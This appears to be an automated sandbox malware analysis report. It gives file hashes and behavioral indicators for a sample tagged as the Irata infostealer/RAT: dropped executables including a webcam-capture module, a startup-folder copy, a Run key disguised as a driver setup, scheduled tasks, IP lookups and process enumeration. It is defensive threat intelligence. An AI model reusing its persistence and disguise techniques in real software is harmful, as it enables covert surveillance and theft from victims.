SHA512 89caa81e0ce39cf18e64c0e10ac8129480377fd3312640db61ae89526b137f8b0c2393339043914b37b13364f26d504344ac0e567f7299969c10ca05c5977281

C:\Users\Admin\AppData\Local\Temp\nst1B6E.tmp\7z-out\locales\kn.pak

MD5 3e24c5a31a35b84f5152167ca1fa3612
SHA1 90220341f716a482bae59969da84b082f7af66e7
SHA256 69a3e112836960fa26b2279ee818ddc2453fc198b21db2363184d64a7f7b54cf
SHA512 12f2c3892c2d4efb33fbd60991073427872df4a0ba97939187c19a2c48db6eed4d3291ad6f78615dfdbda4a1d6a6161bda4a2d1d0df91b5d1aaaa962a9d0064d

C:\Users\Admin\AppData\Local\Temp\nst1B6E.tmp\7z-out\locales\ja.pak

MD5 0c5530265ada905b29464154ad2e93a6
SHA1 e563d08a15029d9954795c779cc429cf8adcee40
SHA256 e95c62abd595761c54fc2a5f7797ead9a9e17567e0850722a5d787caa4544431
SHA512 da27cb6f515efdd0e299eda0f5d5e9c7878afd41177eb2597fe1e0e9168ff499fbdd83f829fe1c385e88fce1bba8d982028a67f770f78820aa91e0b00af56d3d

C:\Users\Admin\AppData\Local\Temp\nst1B6E.tmp\7z-out\locales\it.pak

MD5 5aa225aad4f9fe6d05ec24905a827d88
SHA1 f6d5ed337bd8e9cc3b962d3a498e3430fbf6de22
SHA256 96e02ab6937a1f1cb58762159761a737ce0e1dcd6a253554392baf4389326eab
SHA512 3fa928f19bdf65b8fbb274b478a801821b15c01224c113a8d7f6121a077b432c0cc84eefd9028a76adea9fa4bb65dcb868edfbd4368b1e4d477c49e187e4288a

C:\Users\Admin\AppData\Local\Temp\nst1B6E.tmp\7z-out\locales\id.pak

MD5 e40cb2f3b4db379e4d187aeef0dfd300
SHA1 537b1ebc615c980c89bbe2b9e91a11199fa7d6a6
SHA256 3339ef011c9bb64868da94adb25f4490acbc7f893e4337dbfe2797754cd659f5
SHA512 b87464460077aa55feb92eca8ed23d9a61829378bae7890c8a95dac5fcd735b145d65661f27facfe2586fcaa169692b00d8ee8dd505dc44bff7f7fd090f3e96c

C:\Users\Admin\AppData\Local\Temp\nst1B6E.tmp\7z-out\locales\hu.pak

MD5 43bc8c2c4a177ab6062e2d20352de033
SHA1 eaa9d834313be636f697efd9dc667194ffd0e3a3
SHA256 883e2a6f025fd14fbf7d2e713beb9316c5ac1e166ccf8be38dd10758fcc164cd
SHA512 d5144426d498921ee6259b92377dd7c7613b4f65c4db399950c82ab819a99f2d25a0308d6d3c8024bf104cb00526dfbe795ac31b735f5ed03685470a294d3637

C:\Users\Admin\AppData\Local\Temp\nst1B6E.tmp\7z-out\locales\hr.pak

MD5 72a177766c96a0bb998cdb79ff6fa207
SHA1 a57a7134ee35eb62ea7f72dd276297f40efc0c2d
SHA256 b4255ef5da9fe01f5c1a98b744fb6b42dbd2cd9361e1598f2b9b6554c5f2f0e6
SHA512 3355a3420f10576e92fee248ba33dad7323df926a287a388c7adaed6742d1487fd197d916b88bdf957fb917959ba74703cec349ffff46bf4b25d15f36f2888e1

C:\Users\Admin\AppData\Local\Temp\nst1B6E.tmp\7z-out\locales\hi.pak

MD5 19703f4b469ae1d6288c577febfd032b
SHA1 33879163d62ad026460c9290668fdda4b83c48ab
SHA256 43ed11e0d997dcebcf346fdb945dd21d2a9a28eaf65e84b3c37609433041025f
SHA512 1d72c7109e281c9041c14362e3bfa7c31aed8d44abe3523b0e0bc9502a59e6094f75d757582c4fa005067718a02adf527a24287728741b5c84da81aeaa77e278

C:\Users\Admin\AppData\Local\Temp\nst1B6E.tmp\7z-out\locales\he.pak

MD5 74812a7892e5e259a34d7cb9018708f8
SHA1 b3aeceea28340f4db568bddbfa6eba7145564d76
SHA256 2a236a00b1dcc4a0dc6c416e71c2316cc935b281f3021634da92eeca9946a028
SHA512 d320796c8de88de68b534c77b377648ac7061e3ba4bd870fbce59b51d6d13461a2ae7c226c6dbdab9ec8581e72d6744ec50dfa1426bb850fef930d699e32fe62

C:\Users\Admin\AppData\Local\Temp\nst1B6E.tmp\7z-out\locales\gu.pak

MD5 f32668870370b0a04dec2d61af594c6c
SHA1 a041b0957c082e1483246ddfeb2401a156c03c3a
SHA256 478e0970aac4764b26fa94a9d38f2710a7b6919f0891bfcf482cab7a19e923cc
SHA512 ab5c237c2036b89df0aa2518fdb0f8d13ceafe958eafd5a8f03395ebcb457056d21ed29072dbd7037649885c021848e311f425178a5deecce56f59c1669100f8

C:\Users\Admin\AppData\Local\Temp\nst1B6E.tmp\7z-out\locales\fr.pak

MD5 c0817366a0c3a1dd04ea67ac36418c85
SHA1 b35a1cc7e85bc491ede5018c6c384e409e07de6d
SHA256 3644d293a8b7a528bb7f5ebdaa2229d40ded6ad00507e53994899b94f0cfdfc4
SHA512 a59c7fd25f556a4e0ea2d305a9aec64f8d2a1276d95c5552b2ce4a9d852e0bb86195f582b637d90b9d0f62f1e50e79ed8243c6ec14713f5c951a55ddc0d3768e

C:\Users\Admin\AppData\Local\Temp\nst1B6E.tmp\7z-out\locales\fil.pak

MD5 b2a9ef0201c05990c5f0bd3d0ea9e665
SHA1 32da85b2a03048d30918f3dfe6d3a43b5187d253
SHA256 0e714a62de29fd530e751958ed8141b6fe2c7c2a693638e2dee18dfd11294b76
SHA512 e7ceac3489311df320cba53d070c0d0f437af3b883424cd415fff4c36c155dd60d6cddd5f4a539d76ea9b804642c4f52c7bfbbe2d138403b121ec88c293f4a10

C:\Users\Admin\AppData\Local\Temp\nst1B6E.tmp\7z-out\locales\fi.pak

MD5 cc592d91ce8eabaa75249cb78b889376
SHA1 f2f0f7f105a17f3e4b1a97ed0e3c2e871c2c3eac
SHA256 b1cb0b32efa78fd8634652c74f298f1d5127f2363ef601cf000417e5c7fefd20
SHA512 58e2eaffe26d8fda8df43e7ebef449cfff1065e940c128efa0276511e34e96e52da9230f294b01d4ecd8ef606b792d372bff897d6d8bb67c31379418ce867d48

C:\Users\Admin\AppData\Local\Temp\nst1B6E.tmp\7z-out\locales\fa.pak

MD5 10371d4a5238a1f2d3c27019f9fc56ff
SHA1 8a06ab19c663eaaf440eac56e06f23555d88be2f
SHA256 017d2a1f6f41201c6bab088c4bb7faa2c6ecf719e9a395209a81430636c9b4e3
SHA512 5b50d0e1ef87dc26b8895c36f844c47a7a1db658fc8fac383d920bb5fcf5f18d1fcde33dc86c63f86be96dd357d5a0853ac873f1f0dd7614050608e03be0c16a

C:\Users\Admin\AppData\Local\Temp\nst1B6E.tmp\7z-out\locales\et.pak

MD5 99821929f1f789489b516ed3ee684420
SHA1 5e0e309d2a716010f5e8169bb7880c20cb493a9f
SHA256 563b9af913d08886c9244533a2b28c440b1e0727176216d69180c0fad17d7abb
SHA512 cf7b6d8c96dd89b6b69fff3444d553a4f9d86b90ccc985d9623bff535970960fa9d7e9385e294e3c7647d8e8dd63555341a200a36ae56619d86527cb3c70ef61

C:\Users\Admin\AppData\Local\Temp\nst1B6E.tmp\7z-out\resources\app.asar

MD5 181ab714a264a6a53227f7f9c81cf5db
SHA1 423cd3fb6d75c17a5a4c48424afd3dde3dbc9bab
SHA256 a96553b6ffd3c67933454d3866e486a0f60fc9772d3aedc50abcbb248e991ead
SHA512 04c84893595e13f28f5cd28599b4f1bf4348b04544cda3a25b333e5906a13ca0b8db78dfd7bf2116094d62971e75a2215f73139ba94a8e5210d6933fe5a65f11

C:\Users\Admin\AppData\Local\Temp\nst1B6E.tmp\StdUtils.dll

MD5 5bd20bcb5f66d03994e8defe1c31ff62
SHA1 f13067716eed259947bd99f7967c8307c5c9de63
SHA256 d785cc24a49a4e90accd2795c7d187873e7d99ce38fb9adb2f625bd86c0d8407
SHA512 012bd7051af198461b6c2aba0b41422e5fccaab197082bb54e29d1c978162c999f2213f7a952eac9ba0bfa7776df45abca044c53dbe7600d809dcf3b5275571f

\Users\Admin\AppData\Local\Temp\nst1B6E.tmp\StdUtils.dll

MD5 2f5001fac3d730f90d0643137eacfd26
SHA1 f893eed8e3419a38c9d75d5fb77295713466c27f
SHA256 6a19961e1ce826c0a1e6d24a0346a46c37eb4eed997dd2ec9c4a581fe7abfbd8
SHA512 298d64a5c115c76e11918ba22c970162a7fae82a3534f7617e4574c796088c75fff50329cc362b6e58965288373b0afd2de9309ef0174a46410dbb19ef1dfe91

C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\v8_context_snapshot.bin

MD5 642954279f8441586c8014d058803601
SHA1 f7c538bd6bcb8d94bda69f16fc326fe3f60e2f6b
SHA256 7460000899eec8d3b6e27e84cbd597c749f7eb7109c47f14055be08ff42476d0
SHA512 75ba4332c5a0d3f3a93c3bd5ce719c571ba2dbe985e343803bbbd92ca9a186fdae83391c232abbafdde070a86e5dabc78ab933eb7797564e3d430abb7492e741

C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\icudtl.dat

MD5 c53452e21a16bc554b3fa795de992b49
SHA1 1d726559af6d3f756ea392a054fe41a730477f92
SHA256 dfedde4db7efd18f0d00bda07307b7de94d48ae615a50a9158d3f2329cdca064
SHA512 12b966356688ff6da7733a3f6c75797c937b2a6fd37ba1f6f68b29dbef4a4d17fc42173bc53c93422ac9186acba4f8766a72b621e6fd02e6821d6e4d5bdf2f1e

\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\ffmpeg.dll

MD5 c1265c05c5ba7a899dcce63e57fabffd
SHA1 40bf048ed69660354ba4332779a2b25feb766af4
SHA256 0140bad41eed80d7d4a1b68fd7b962f575cb8072dd515bd8977f458cece6b59f
SHA512 9cddaa67951bd38962a87c039e9fe0cfe4e712f98bac316b4053d5f5dcfff60c284d511cc926a8171762091769bdc09ca81f5a129902c5b4f2cf39a9fab12eac

C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\ffmpeg.dll

MD5 36279cb843e6a0d08edcc2d94184af11
SHA1 130916c4714855701ad15455674aa5876306649d
SHA256 484608ac1f50d7ccd6a76ea4cb1103c62cd8a4d1a247ea133436574b61d16827
SHA512 e264de44bb727c2a75c76b370ea16d9c5d0f77c4fd16b64aa78d8216dcbfe73bc41022f3aec7d19e4093320439ae300f64967480b4e1e1bc6651c3b5fb5327d6

C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe

MD5 551c7b9c6a5132485643a433154c009b
SHA1 7baf447cbb374fd2b2ecff7db262ed89dbc0235b
SHA256 054372f9d0c998880f99d6b9a92fb22904548269c014ecf3a2a5f88e351d2798
SHA512 96d9576e7cf7a44ce793b3062fe101520458c9e23c02a2d91ad741db0251fb871a1868017fd52bf6a0b10ca908512e1f62dd94acc9c1431cba8c89587984c1c4

\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe

MD5 5c14e5ddf634436d5930b4ffa6ad76af
SHA1 8ce1e46b9243c502461bb3c6d49588af624e0a2f
SHA256 c980fbbb82793a67f24d2120a20423c65765637cab43ab2ffc9d6c4a30c637dd
SHA512 8ac17aa2b34e468e9fb552eb47a046fecdf8ae1d7c1872b5ee77395e0125e3e81f5a4d082fc2e7f9fc724c4d6e9f1f7733033d4df9a905420db994fd5f374cc7

C:\Users\Admin\AppData\Local\Temp\nst1B6E.tmp\7z-out\swiftshader\libGLESv2.dll

MD5 e1ac6b0a2938b1617de8f526204ea12f
SHA1 13ad1b23b29f8b0232062d276fd425fb4e57c8b5
SHA256 c6cb768d23458dc57e29c2c4c9437127de9d35c2053c0e2063fb389c40ae780b
SHA512 a8e408b6e7c1ecc30c737e895c9120317e597d9f474f189efd0bae5b447a304692e7b89c06fd85f7faa1591d98b20a39e4c3304d3c4c1338c406c8c2e0951330

C:\Users\Admin\AppData\Local\Temp\nst1B6E.tmp\7z-out\swiftshader\libEGL.dll

MD5 fd825c8fdb3c89d1294e8ef084929379
SHA1 8c3d3bed881b832fd367eeb033746688e577fff4
SHA256 742bea1ddb92a83909a3b9ef7b9559a065b98b699874aced8ef316492d85d469
SHA512 000c4228f457110a9a036d802934c76da0d82d5e0d3105b564cf7d633aafda3f940af84bdf3197a40bfd4a4860521012c96fe41655b61f9562ac37304f0ae399

C:\Users\Admin\AppData\Local\Temp\nst1B6E.tmp\7z-out\resources\app.asar.unpacked\node_modules\take-cam\snapshot.exe

MD5 28db57e93c54ca1e21678703e70386f3
SHA1 985d70b59bbabc156096f60199579e21a466a1a6
SHA256 83e3248c7945d8816267b06352a1850ea863d784a431cd7891ab5e9d70e6daec
SHA512 78b941e704e50fb26e62f2225edddc6912b130e3cf6042f12af5ed8b711104de1ec395f08d28227534ec807e4685e5ba91f10203cba0850d1f0d464b7ba61212

C:\Users\Admin\AppData\Local\Temp\nst1B6E.tmp\7z-out\resources\app.asar.unpacked\node_modules\take-cam\prey-webcam.exe

MD5 471b15abc9f2e98fb7ed7361d3f045eb
SHA1 95b5798d80a9410872f6ed485ae2b43ca3745540
SHA256 7c262639cb22348dfd627dc07c76e8748e5bcacde2dcf1614773ab174c831004
SHA512 5b3b59aa1dbaef31b0ff6ccde082d7c312e39e311a46fe20d590d5d7765f934d3b663da9609ff4fb7beba2e8fa85376cf74f14ae077f3c0b49189cc28c30163a

C:\Users\Admin\AppData\Local\Temp\nst1B6E.tmp\7z-out\resources\app.asar.unpacked\node_modules\take-cam\package.json

MD5 067e233b0609d56ff4756bedd8c0efe0
SHA1 96419d05adc4b6674948b4ac14f8ab5bb3ce4380
SHA256 6bee642c1b5de99e4edba87ec3221c2ecd10b65e666b6f2bef64a745538ecf74
SHA512 94900f5ff762930b1b060ba4dd44d629d6c3e2dfc0dacb1a543f1ea5a3cd40e793acaff4abefbff588ceb422d65f8041ec190a2b56f7c303c3314eb16eca4159

C:\Users\Admin\AppData\Local\Temp\nst1B6E.tmp\7z-out\resources\app.asar.unpacked\node_modules\take-cam\DirectShowLib-2005.dll

MD5 a9cc3c5ba1f5384ae0b432727823da77
SHA1 5951735c35fd11db3fa01d457c3ffc542f952641
SHA256 6a59143cf4a7be1ec0ebe3ae032a3a59134aefb4c6e4409f1e2b999699a31f08
SHA512 730ced20681eb7bf81bb0ab93b853239c9da03025b1d6fc7a52f205a2875cfa15a738eae2ddb598e48c4f2f805fe4206969094842c9bbfda7961b3d8eb160e7c

C:\Users\Admin\AppData\Local\Temp\nst1B6E.tmp\7z-out\resources\elevate.exe

MD5 e9ea5129b3f1041b881413f016145595
SHA1 0e41ed8e05083ecd6b2cc1716e7fa2c19d64339a
SHA256 6284700279378f3f45f7995706f5ec99b535ab9a703ede87bf5920dc44604423
SHA512 737fd2a3ef29c5fbb887fc287b8d956824cf4332261b7fa5e545284106a759fa1f909838dd16a6c7baceb2ecd94591c158629f4ef6ceec506352e3000dc94eb0

C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\resources\app.asar

MD5 ce7e6c0ef942b02c66a42e8c681da0e8
SHA1 dbee0726c13ce93e64736866553a55f878c515ff
SHA256 1a00841e525070d0ca7e36b559a2ccfb64abed05fa3bd10592ddcbacd95ba7d8
SHA512 c53704e3a829b7ba9b0a80b0e7152ff1c4f665568350f6c4e04107fabcb921131cfa359a906786e9a47044b4f794436d8b6aa15f5f5f35ac9b7fb01d75cb7ca9

\Users\Admin\AppData\Local\Temp\8e4276c1-469a-4f74-8faf-1f21e0cc9e95.tmp.node

MD5 06ab6180b4cc872d0634bbd8c4d3bb87
SHA1 df9444bfa48b3a8bcf6c4d9ed5289691ed7b6a0d
SHA256 c6639c23585875460fdabf9ccfc32fec65081313c776ba7cd611c8352659bd40
SHA512 edcceabdc39fd52e51249b61ecbe50361391d4c8151ab4f643c3acab0a4a3553f86dfbce94eb7162d94525f3032f47e93861dc3601ac8abd2d9339a0d0643a61

\Users\Admin\AppData\Local\Temp\7bdcf626-d844-4e70-99ea-373b9fc5b4f2.tmp.node

MD5 7e827f994d4cb4667665f7f71315b27b
SHA1 7357eaa1679f500a810e675c2866115428303dbd
SHA256 87d0adbbce8e08fe385950ec2608655beb65845d0909505b24113733925a2136
SHA512 8db731d9bf0ae00229f959a880f188c17bcb48c298eb6add91f009d0bd4b6c7d739eccc79221fb17d581073f05ce399b9f8d5072e5aa4cc6f8038e2c0ac36754

memory/392-584-0x0000000000060000-0x0000000000061000-memory.dmp

\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe

MD5 242f5d690d3c04bb9a8dd4eab01ef88c
SHA1 f7ec249ad66fe6681624ffc5929385a34f28f14f
SHA256 eb04615236ab2d4ec8a6ed7a50d27338c0db7e3d9112db3822ca853a801f5dcb
SHA512 40375a53bab516f2e73330a43d42428ab8d8040ec551ed224d79cf5b0cfd88549ce1d38ca7599800a9cf6d412a29b19344e0df80f22503df6d2915e23fb8849f

C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\resources.pak

MD5 e6e482daa03bab528515cc55a4cc33fc
SHA1 9b24a8bb35bfb36f53815799e6ec14ace0219eff
SHA256 9ff3577092fd7f8fb6f9ec9117d3f8f29eb3e0eff15a9a1339f78b90f708667c
SHA512 2cdd29bd74f771ef5682a8cd8347367d3e4f8fdc9465396c8242dfa3637f030a604d4a0fb7ea21a3e2137ca5180660443db1fc993af304ade9ecb42677de69bc

C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\locales\en-US.pak

MD5 a8e237ce2b9f21eefed64e99b73a5d49
SHA1 4c1fef75894a4cf126e14b5be89b74e46d868ebc
SHA256 e8d5b884cb38825c2fa270efebfda2b07148a719e24e4c8fbf0fe3ac8802a155
SHA512 7aac8d1fadb19b61e82f4e95ee577af01d923620866dd697d3747220e7089154694c693d0ba38b54b22af8854acb021b400fb9fb92d2c33edef38bcbd458fdd0

C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\chrome_200_percent.pak

MD5 ca700fc59a04f2884cf43f4ab4d144a1
SHA1 f67faf7691ed6e2919160e728bf2b69426ef7d91
SHA256 3aa56d6423ff2c451f9264153b4b06809583efc2e29e6d9bbb04cdcb2d8aff0a
SHA512 7568f8fbeaac72b30a433121b84d95c2f4b2add4672dd4acb55b82248f05564eea39edb78c84dc2ab2e987d8783e2cf192339ea41930765d14d518b34ad7e26a

C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\chrome_100_percent.pak

MD5 06494117220f1caad502f04c1f223ac0
SHA1 9d433dfb003d24b2aa80b0a7b316388254fcb638
SHA256 897c1a5ac8e353e9ef2a4d7fe04c7f43febb3f75ead3c22b3bbba5a41de6d36a
SHA512 c59aa91309bbaa38051bc659124e45892c135303102de33bc41cce611748b447044b442464cfbbe7019c06d8c9a411474a4bbeb2073e1cdb7470d42c10ca43e8

\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\d3dcompiler_47.dll

MD5 46ebdf04aea3b60c240269509815b6e0
SHA1 8d8627b1834beb9744eccd85d74e1da325d81482
SHA256 90e68287ca43ce477d431cf07f5de9ddf7ba71b8ef3bb8448ed55b4e18fbd9ed
SHA512 366592dd807f1b9e7b93dd49a772c1620fe2cc9230923462523e44a9bc002ecf2d6bbe712284a90e425fe544140903a5ee3cc6c9c7c1a92b10213915c94ffb8f

C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\D3DCompiler_47.dll

MD5 7cc2a8b394e7502dbb68d2e215d100a5
SHA1 8c48e08d5685d70634624cc23dd473219d7c1d7b
SHA256 02d7dc8308e98db9ca50c8bb875e27f416c52c0c86b1c1bb0ff59c0abd03b8e3
SHA512 eda92c091ca675911fa713916c7a1ed41a3292e68f4f60e46f94a251545f3176f06f288bf055f3e5bdaefbfa947683958da2e4bfc747bb2afaab181525b3ca0d

C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe

MD5 045324b2bfcdab79e393e55e6c5fff85
SHA1 a68860088f4bf6883106a170f31fb6d681865560
SHA256 752e4d74fb04c606ff217ae40621514cdb9e7735fc13c8cc4a36cd781091cfea
SHA512 d23dacffcf1f6361d68ca9c17085fc3a404bb47d210f383f0c407d4ba1e30fae29dacd691775406871ee31ad1eeac23aa612f45685980a9c17123e1a3cf927ff

\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\ffmpeg.dll

MD5 ec8f2df6a1197b95631499d536dff2d2
SHA1 4d26cf17b157e96adb26bab03016f01886bd12cc
SHA256 cad0ee927cf58a280ac11aa76928026ed0c9ec395f3ecace40e829d9999303a4
SHA512 d8a06a85db1a9d4a1d14299a114d8a80256639da4169925ea3a2b38e9ec460e867fb7eb2b3d93b1e9d11d52e46b74fcc6f47702b19810738526639b3d2d7c62c

memory/392-619-0x0000000076FC0000-0x0000000076FC1000-memory.dmp

\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\libGLESv2.dll

MD5 d729a27d262d8f00a355e34c0b037f4f
SHA1 b58cf10ffbc04e732141c334039951dbf0ea95ba
SHA256 a65a3571f1620342991d4fc030d079ae83de8bd64c0145ee3d452f48d380245e
SHA512 db643bd9acd334e53428eed5464c15888f841243839c4230841518a61dec9ca56d344ff0c413571915f92fadfec39f9cc8bd927743d3a9e93ea09a321714d556

\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\libEGL.dll

MD5 18eabeee3eae28544506ff6cda760564
SHA1 5cc548b3c1f56e671967956ca42cb4c51cd79d17
SHA256 f8249795367272359bff72ef08b15f01b834cd40d9259fb9971159d43e75c620
SHA512 daceb09ee5e7124c807723a7f9742c42e8bcb2f9194d5af483b97f0da49956cf7fc05c3bda7680353ca54a24f3a4f83ecd9d3c53798f58b39622a166ab1274a7

C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\libegl.dll

MD5 d587835b4897a2c4cbd38d9b511318b6
SHA1 0d7ff46e80bb328f1cb09f0f777f435bda883a63
SHA256 d89e025d0399e96273bed658e00fefab21ecfa3427ba2422dcddd93440455570
SHA512 82366ab858508a3eb2958b4528ac9d371ea9698bca0476a7e53d2de0a40b0465e3afa312c125557d82d5748c522ac37fdabda92bf7b23ff4bc6c335995434263

C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\libglesv2.dll

MD5 a6afe3c4332ab8b5500f451c599b92a9
SHA1 848dbe3bf4d038ce2a1a94c6e685939cb0b553b3
SHA256 c8545e4a14329ba74fe5490f3141ac3701e4c8911c1c6f88ffa0a2887489e8f3
SHA512 b0ebb32e5b483575b72e26cfb9d463c2ada3016e82fdb16b09f96c7b14849931ef7f7165ffab353293a35aca60fea0ca0532af9fdfe2787d873a9c93bea3313e

C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe

MD5 0aecc16a4d2648c25e67531d853c325e
SHA1 e3cc0d0af1b4ef24cdec6fe8b8ed32e1d39c3a5b
SHA256 bc4d64fa83bdf773671e614ecf627718087b946c0d3ff310423d846272906781
SHA512 9c11b8b62ceaae876d9419679380829fb9605c2480270c671806009d1109e96266b6fa872e9e0a53ce2b8c481294ed451335b9eade9b75a022ff57a9f2e44621

memory/952-657-0x000000001B5B0000-0x000000001B892000-memory.dmp

memory/952-660-0x0000000002D30000-0x0000000002DB0000-memory.dmp

memory/952-662-0x0000000002D30000-0x0000000002DB0000-memory.dmp

memory/952-663-0x000007FEF3130000-0x000007FEF3ACD000-memory.dmp

memory/952-664-0x0000000002D30000-0x0000000002DB0000-memory.dmp

memory/952-661-0x0000000002D30000-0x0000000002DB0000-memory.dmp

memory/952-659-0x000007FEF3130000-0x000007FEF3ACD000-memory.dmp

\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/952-658-0x0000000002040000-0x0000000002048000-memory.dmp

\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe

MD5 433c73a5924cf4a7cf61922a7312157b
SHA1 8d8d7fb4ec7fc70aba32152424eda6e15f7d7a86
SHA256 404f23c48bb93f835d2542d60d2783d960d2f49ec331e792ee74e4ef82aa454f
SHA512 5aca75d9899d18913a8be5929cd9009f2532cc94d6d77490f594fdca82c459dba45c82799ecfc18bccc1fc0b41379aff8c0f55c3e2fa12ae1e07def7c3879d05

\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\ffmpeg.dll

MD5 ac6a5fa4cf9c0a0e860cb37154f50d57
SHA1 7746abd66013479af81ffae666aa1682c6f8b839
SHA256 9ff9c2bfa1144548f242579ba46b44806081c0841c0c9b1c0ce04d6e9d2c5e40
SHA512 ddbc734f16e0e3a03514137bac294e8c98386d4f3e3621c77212b3e86644775999bcdedac21d6af9941c0e76eee7aa426cb7c3992365c9a4218c9247734cb6b0

C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe

MD5 ef11f5f6836fca64c6494522935fffc8
SHA1 ea2e9122dec4a363819d05aca4235181690369ef
SHA256 88ac6940f6f0bb58bcfd5b08a38baad24eddcf555c335f9d85a0800e27aa3be9
SHA512 2f013ae8ee36604790d37452f9603f22f9f2043caf87b114f70b39c2a6e4d7a228e1914c2eb7359072ea3dc4b0b38835db7c6b074433df3d4cd345e427c62e47

memory/952-688-0x000007FEF3130000-0x000007FEF3ACD000-memory.dmp

memory/952-689-0x0000000002D30000-0x0000000002DB0000-memory.dmp

memory/952-691-0x0000000002D30000-0x0000000002DB0000-memory.dmp

memory/952-690-0x0000000002D30000-0x0000000002DB0000-memory.dmp

memory/952-692-0x0000000002D30000-0x0000000002DB0000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2023-12-20 08:46

Reported

2023-12-20 08:51

Platform

win10-20231215-en

Max time kernel

94s

Max time network

161s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Moyetu_bEtaa.exe"

Signatures

Irata

trojan infostealer rat irata

Irata payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Moyetu_bEtaa.exe C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1682406436-2801920780-981986064-1000\Software\Microsoft\Windows\CurrentVersion\Run\WindowsDriverSetupFC5uoY = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\CachedFiles\\Moyetu_bEtaa.exe" C:\Windows\system32\reg.exe N/A

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A

Enumerates physical storage devices

Collects information from the system

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
